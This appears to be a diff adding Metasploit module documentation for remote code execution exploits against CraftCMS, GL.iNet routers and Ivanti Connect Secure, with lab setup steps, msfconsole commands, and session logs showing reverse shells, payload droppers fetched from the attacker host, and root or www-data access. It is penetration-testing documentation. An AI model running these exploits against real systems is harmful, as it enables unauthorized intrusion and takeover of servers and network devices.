+[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwc954AkmwDFJGPdMCAemNwEhbK9MZE1sbFjd87crw4EoQ8IRya-nD4j7s9vkiPXENKkm6Hai6rTX1l6MxXV with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
+[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwBlG7PmcChFTs3mrZWe19ux0Ge4-K3sXMWLGzskiOvEJN9O34cT2vhArtS36BI-SM8HDCBKggdyux0 with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
+[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwS1jEDX4_Jx7YDDvUtpywgCk with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
+[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Attaching orphaned/stageless session...
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Meterpreter session 1 opened (172.17.0.1:9999 -> 172.17.0.2:47500) at 2024-01-16 20:04:06 -0500
+[*] Server stopped.
+
+(Meterpreter 1)(/usr/src/apache-ofbiz) > getuid
+Server username: root
+(Meterpreter 1)(/usr/src/apache-ofbiz) > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 6.5.0-kali3-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 1)(/usr/src/apache-ofbiz) > 
+```
@@ -0,0 +1,231 @@
+## Vulnerable Application
+This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS which is a popular content management system.
+CraftCMS versions between `4.0.0-RC1` - `4.4.14` are affected by this vulnerability allowing attackers to execute arbitrary code remotely,
+potentially compromising the security and integrity of the application.
+
+The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary
+PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.
+Using this vulnerability in combination with `The Imagick Extension` and `MSL` which stands for `Magick Scripting Language`,
+a full RCE can be achieved. `MSL` is a built-in `ImageMagick` language that facilitates the reading of images, performance of
+image processing tasks, and writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious
+PHP code using the `Imagick` constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious
+PHP code and gaining access to the system.
+Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating
+system as the user that the web services are running as (typically `www-data`).
+
+## Installation
+To test this module, you will need a vulnerable CraftCMS application.
+
+This module has been tested on:
+- [ ] `CraftCMS 4.4.14` running on MacOS Docker Desktop based on a `DDEV` deployment.
+
+### Installation steps to install CraftCMS on MacOS using Desktop Docker and DDEV
+* Install [Docker Desktop](https://ddev.readthedocs.io/en/stable/users/install/docker-installation/#macos) on your MacOS distribution.
+* Install [DDEV](https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/).
+* Install CraftCMS following these [installation steps](https://craftcms.com/docs/getting-started-tutorial/install/).
+* NOTE: After step 2 `Scaffold the project from the official starter project`, open composer.json to edit the CraftCMS version and
+* set it to `4.4.14` or lower.
+* Run `composer update` to downgrade the `CraftCMS` version to a vulnerable version.
+* See also these [instructions](https://craftcms.com/knowledge-base/downloading-previous-craft-versions).
+
+* Continue with step 3 and after completion, you should be able to access your application using your site name (https://mysite.ddev.site)
+* To access your application from another host, you need to setup a tunnel otherwise you can only access it from the local machine.
+* You can follow these [instructions](https://stackoverflow.com/questions/53371087/access-ddev-web-container-from-other-hosts).
+
+You are now ready to test the module.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892`
+- [x] `set rhosts <ip-target>`
+- [x] `set rport 443`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=php, 1=Unix Command, 2=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `shell` or `Meterpreter`
+
+
+```shell
+msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > info
+
+       Name: Craft CMS unauthenticated Remote Code Execution (RCE)
+     Module: exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
+   Platform: Unix, Linux, PHP
+       Arch: cmd, php, x64, x86
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2023-09-13
+
+Provided by:
+  chybeta
+  h00die-gr3y <h00die.gr3y@gmail.com>
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
+                                        ml
+  RPORT      443              yes       The target port (TCP)
+  SSL        true             no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       Craft CMS base url
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+  WEBSHELL                    no        The name of the webshell with extension .php. Webshell name will be randomly generated if left unset
+                                        .
+
+
+  When TARGET is not 0:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.
+                                      0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular
+  content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are  affected by this vulnerability
+  allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity
+  of the application.
+
+  The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class
+  which allows to run arbitary PHP code by escalating the object creation calling some methods available in
+  `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which
+  stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that
+  facilitates the reading of images, performance of image processing tasks, and writing of results back
+  to the filesystem. This can be leveraged to create a dummy image containing mailcious PHP code using the
+  Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the
+  malicious PHP code and gaining access to the system.
+
+  Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain
+  access to the underlying operating system as the user that the web services are running as (typically www-data).
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-41892
+  https://blog.calif.io/p/craftcms-rce
+  https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
+  https://github.com/advisories/GHSA-4w8r-3xrw-v25g
+  https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892
+
+
+View the full module info with the info -d command.
+```
+
+## Options
+### WEBSHELL
+You can use this option to set the filename of the webshell with extension `.php`, otherwise the name will be randomly generated.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+### CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp
+```shell
+msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.25
+[+] Deleted /var/www/html/web/CDfbvAnrZMH.php
+[+] Deleted /tmp/php5M63PK
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:51044) at 2023-12-17 12:31:55 +0000
+
+meterpreter > sysinfo
+Computer    : craftcms-vuln-web
+OS          : Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+### CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash
+```shell
+msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
+target => 1
+msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted /var/www/html/web/XGCuZFdoia.php
+[+] Deleted /tmp/phpakTlmu
+[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:51101) at 2023-12-17 12:34:34 +0000
+
+uname -a
+Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 GNU/Linux
+id
+uid=501(www-data) gid=20(dialout) groups=20(dialout)```
+### CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp
+```shell
+msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
+target => 2
+msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/bzzA52uoIqWP
+[*] Client 192.168.201.25 (Wget/1.21) requested /bzzA52uoIqWP
+[*] Sending payload to 192.168.201.25 (Wget/1.21)
+[*] Sending stage (3045380 bytes) to 192.168.201.25
+[+] Deleted /var/www/html/web/sFQEhvKKcl.php
+[+] Deleted /tmp/phpeQPKpy
+[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:51122) at 2023-12-17 12:35:54 +0000
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.16.2
+OS           : Debian 11.8 (Linux 6.4.16-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+## Limitations
+Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory
+set by the `upload_tmp_dir` setting in the `php.ini` file (default `/tmp`). These files are automatically cleaned, but in case of
+any failure cleaning these files, do clean them manually otherwise the next exploit session will fail using an outdated MSL file.
+These files start with `php` and you can list them with the command `ls php*`.
@@ -0,0 +1,319 @@
+## Vulnerable Application
+A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute
+arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log` interface in the `logread` module.
+This exploit requires post-authentication using the `AdminToken` cookie / session ID (`SID`), typically stolen by the attacker.
+
+However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a `Lua`
+string pattern matching and SQL injection vulnerability.
+The `AdminToken` cookie / `SID` can be retrieved without knowing a valid username and password.
+
+The following GL.iNet network products are vulnerable:
+ - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
+ - MT6000: v4.5.0 - v4.5.3;
+ - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
+ - E750/E750V2, MV1000: v4.3.8;
+ - X3000: v4.0.0 - v4.4.2;
+ - XE3000: v4.0.0 - v4.4.3;
+ - SFT1200: v4.3.6;
+ - and potentially others (just try ;-)
+
+## Installation
+Ideally, to test this module, you would need a vulnerable GL.iNet device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+This module has been tested via FirmAE running on Kali Linux 2023.11 at the following emulated targets:
+* GL.iNet Router model AR300M with firmware v4.3.7
+* GL.iNet Router model AR300M16 with firmware v4.3.7
+* GL.iNet Router model MT300N-V2 with firmware v4.3.7
+* GL.iNet Router model MT1300 with firmware v4.3.7
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the GL.iNet devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* Find the additional installation/compilation steps [here](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download  the vulnerable firmware from GL.iNet [here](https://dl.gl-inet.com/?model=ar300m16).
+* We will pick `openwrt-ar300m16-4.3.7-0913-1694589994.bin` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d GL.iNet /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin`
+* This will take a while, but in the end you should see the following...
+
+```shell
+ # ./run.sh -d GL.iNet /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin
+[*] /root/FirmAE/firmwares/openwrt-ar300m16-4.3.7-0913-1694589994.bin emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+mknod: /dev/console: File exists
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+
+[IID] 91
+[MODE] debug
+[+] Network reachable on 192.168.1.1!
+[+] Run debug!
+Creating TAP device tap91_0...
+Set 'tap91_0' persistent and owned by uid 0
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.1.1 true false 11.438110994 -1
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - openwrt-ar300m16-4.3.7-0913-1694589994
+[*] IP - 192.168.1.1
+[*] connecting to netcat (192.168.1.1:31337)
+[-] failed to connect netcat
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+> 1
+/ #
+/ # ifconfig
+ifconfig
+br-lan    Link encap:Ethernet  HWaddr 52:54:00:12:34:56
+          inet addr:192.168.8.1  Bcast:192.168.8.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:392 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:33970 (33.1 KiB)  TX bytes:0 (0.0 B)
+
+eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:427 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:44 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:42072 (41.0 KiB)  TX bytes:5068 (4.9 KiB)
+
+eth1      Link encap:Ethernet  HWaddr 52:54:00:12:34:57
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:940 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:0 (0.0 B)  TX bytes:321480 (313.9 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:65536  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
+
+/ # netstat -rn
+netstat -rn
+Kernel IP routing table
+Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
+192.168.8.0     0.0.0.0         255.255.255.0   U         0 0          0 br-lan
+```
+
+* You should now be able to `ping` the network address 192.168.8.1 from your host.
+* Run a `nmap` command to check the services (HTTP TCP port 80).
+* NOTE: please check your tap network interface on your host because it might have the wrong IP setting.
+* You can change this with: `ip a del 192.168.1.2/24 dev tap91_0` and `ip a add 192.168.8.2/24 dev tap91_0`.
+
+```shell
+ # ifconfig tap91_0
+tap91_0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
+        inet 192.168.1.2  netmask 255.255.255.0  broadcast 0.0.0.0
+        inet6 fe80::6c06:aff:fefb:ab29  prefixlen 64  scopeid 0x20<link>
+        ether 6e:06:0a:fb:ab:29  txqueuelen 1000  (Ethernet)
+        RX packets 39  bytes 4692 (4.5 KiB)
+        RX errors 0  dropped 0  overruns 0  frame 0
+        TX packets 50  bytes 4044 (3.9 KiB)
+        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
+```
+```shell
+ # ping 192.168.8.1
+PING 192.168.8.1 (192.168.8.1) 56(84) bytes of data.
+64 bytes from 192.168.8.1: icmp_seq=1 ttl=64 time=9.2 ms
+64 bytes from 192.168.8.1: icmp_seq=2 ttl=64 time=3.18 ms
+^C
+--- 192.168.8.1 ping statistics ---
+2 packets transmitted, 2 received, 0% packet loss, time 1001ms
+rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
+ # nmap 192.168.8.1
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 14:47 UTC
+Nmap scan report for 192.168.8.1
+Host is up (0.020s latency).
+Not shown: 997 closed tcp ports (reset)
+PORT    STATE SERVICE
+53/tcp  open  domain
+80/tcp  open  http
+443/tcp open  https
+MAC Address: 52:54:00:12:34:57 (QEMU virtual NIC)
+```
+You are now ready to test the module using the emulated router hardware on IP address `192.168.8.1`.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/glinet_unauth_rce_cve_2023_50445`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Unix Command, 1=Linux Dropper>`
+- [x] `exploit`
+
+You should get a `shell` or `Meterpreter`.
+
+```shell
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > info
+
+       Name: GL.iNet Unauthenticated Remote Command Execution via the logread module.
+     Module: exploit/linux/http/glinet_unauth_rce_cve_2023_50445
+   Platform: Unix, Linux
+       Arch: cmd, mipsle, mipsbe, armle
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2013-12-10
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Unknown
+  DZONERZY
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix Command
+      1   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+  RPORT    80               yes       The target port (UDP)
+  SID                       no        Session ID
+  SSL      false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+  URIPATH                   no        The URI to use for this exploit (default is random)
+  VHOST                     no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen o
+                                      n all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
+  to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
+  interface in the `logread` module.
+  This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
+  by the attacker.
+  However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
+  through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
+  retrieved without knowing a valid username and password.
+
+  The following GL.iNet network products are vulnerable:
+  - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
+  - MT6000: v4.5.0 - v4.5.3;
+  - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
+  - E750/E750V2, MV1000: v4.3.8;
+  - X3000: v4.0.0 - v4.4.2;
+  - XE3000: v4.0.0 - v4.4.3;
+  - SFT1200: v4.3.6;
+  - and potentially others (just try ;-)
+
+  NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads
+  when using the Linux Dropper target.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-50445
+  https://nvd.nist.gov/vuln/detail/CVE-2023-50919
+  https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445
+  https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919
+  https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html
+  https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md
+
+
+View the full module info with the info -d command.
+```
+
+## Options
+### SID
+This is the SessionID (`SID`) which you need for authentication.
+The module will exploit and grab the `SID` autmatically, but you can also provide it manually by using this option.
+
+## Scenarios
+###  FirmAE GL.iNet AR300M16 Router Emulation Unix Command - cmd/unix/reverse_netcat
+```shell
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > set target 0
+target => 0
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > exploit
+
+[*] Started reverse TCP handler on 192.168.8.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.8.1:80 can be exploited.
+[!] The service is running, but could not be validated. Product info: |4.3.7|n/a
+[*] SID: NsPHdkXtENoaotxVZWLqJorU52O7J0OI
+[*] Executing Unix Command for cmd/unix/reverse_netcat
+[*] Command shell session 8 opened (192.168.8.2:4444 -> 192.168.8.1:53167) at 2024-01-03 11:12:18 +0000
+
+pwd
+/
+id
+uid=0(root) gid=0(root) groups=0(root),65533(nonevpn)
+uname -a
+Linux GL- 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
+exit
+```
+### FirmAE GL.iNet AR300M16 Router Emulation Linux Dropper - linux/mipsbe/meterpreter_reverse_tcp
+```shell
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > set target 1
+target => 1
+msf6 exploit(linux/http/glinet_unauth_rce_cve_2023_50445) > exploit
+
+[*] Started reverse TCP handler on 192.168.8.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.8.1:80 can be exploited.
+[!] The service is running, but could not be validated. Product info: |4.3.7|n/a
+[*] SID: Gs2KPnIsIQQUzHQkEBVN8JOcq5nV008e
+[*] Executing Linux Dropper for linux/mipsbe/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.8.2:1981/OrfVHM15cua0w
+[*] Client 192.168.8.1 (curl/7.88.1) requested /OrfVHM15cua0w
+[*] Sending payload to 192.168.8.1 (curl/7.88.1)
+[*] Meterpreter session 9 opened (192.168.8.2:4444 -> 192.168.8.1:48511) at 2024-01-03 08:30:52 +0000
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.8.1
+OS           :  (Linux 4.1.17+)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > 
+```
+
+## Limitations
+Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads when using the Linux Dropper target.
@@ -0,0 +1,174 @@
+## Vulnerable Application
+This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection
+vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
+Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
+22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are
+also vulnerable.
+
+## Testing
+To test we used Ivanti Connect Secure version 22.3R1 (build 1647), deployed as a virtual appliance for HyperV. The
+below steps are for HyperV, but it should be very similar to install on VMWare.
+
+* Signup for a trial to download the file `ps-ics-hyper-v-isa-v-22.3r1.0-b1647-package.zip`
+* From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx`
+* Create a new VM in HyperV and specify the VHDX file as the hard drives media.
+* Boot the VM and follow the console instructions to install the product.
+* After installation completes, you will have created an admin account and password. You can log into the admin
+web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+6. `check`
+7. `exploit`
+
+## Scenarios
+To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native
+Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
+
+### Linux Target
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set RHOST 192.168.86.111
+RHOST => 192.168.86.111
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set target 0
+target => 0
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      DbFmtsbLwkUU     no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check
+[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647)
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
+[*] Sending stage (3045380 bytes) to 192.168.86.111
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.111:27576) at 2024-01-17 10:16:52 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.111
+OS           :  (Linux 4.15.18.34-production)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+meterpreter >
+```
+
+### Unix Target
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set target 1
+target => 1
